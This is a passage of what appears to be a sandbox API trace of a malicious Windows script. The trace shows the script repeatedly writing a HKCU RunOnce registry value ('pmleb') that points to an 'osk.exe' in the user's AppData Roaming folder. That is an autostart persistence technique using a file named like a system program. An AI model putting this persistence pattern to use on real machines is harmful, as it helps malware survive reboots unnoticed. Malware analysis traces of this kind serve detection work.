wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.126] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0080.126] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.126] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.126] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.126] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.126] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.126] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.126] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.127] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.127] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.127] RegCloseKey (hKey=0x280) returned 0x0 [0080.127] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.127] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.127] SetTimer (hWnd=0x20280, nIDEvent=0x2066, uElapse=0xa, lpTimerFunc=0x0) returned 0x2066 [0080.128] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.143] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.143] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.143] KillTimer (hWnd=0x20280, uIDEvent=0x2066) returned 1 [0080.143] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.143] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.143] IUnknown:Release (This=0x787518) returned 0x1 [0080.143] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.144] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.144] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.144] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.144] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0080.144] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.144] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x68 [0080.144] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.145] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0080.145] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.145] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.145] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.145] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.146] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.146] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.146] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.146] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.146] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.146] RegCloseKey (hKey=0x280) returned 0x0 [0080.146] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.146] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.147] SetTimer (hWnd=0x20280, nIDEvent=0x2067, uElapse=0xa, lpTimerFunc=0x0) returned 0x2067 [0080.147] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.160] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.160] KillTimer (hWnd=0x20280, uIDEvent=0x2067) returned 1 [0080.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.160] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.160] IUnknown:Release (This=0x787518) returned 0x1 [0080.160] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.161] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.161] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.161] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0080.161] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.161] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x69 [0080.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.162] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0080.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.162] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.162] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.162] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.163] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.163] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.163] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.163] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.163] RegCloseKey (hKey=0x280) returned 0x0 [0080.163] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.163] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.163] SetTimer (hWnd=0x20280, nIDEvent=0x2068, uElapse=0xa, lpTimerFunc=0x0) returned 0x2068 [0080.163] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.174] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.174] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.174] KillTimer (hWnd=0x20280, uIDEvent=0x2068) returned 1 [0080.174] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.174] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.174] IUnknown:Release (This=0x787518) returned 0x1 [0080.175] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.175] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.175] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.175] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.175] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0080.175] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.176] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6a [0080.176] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, 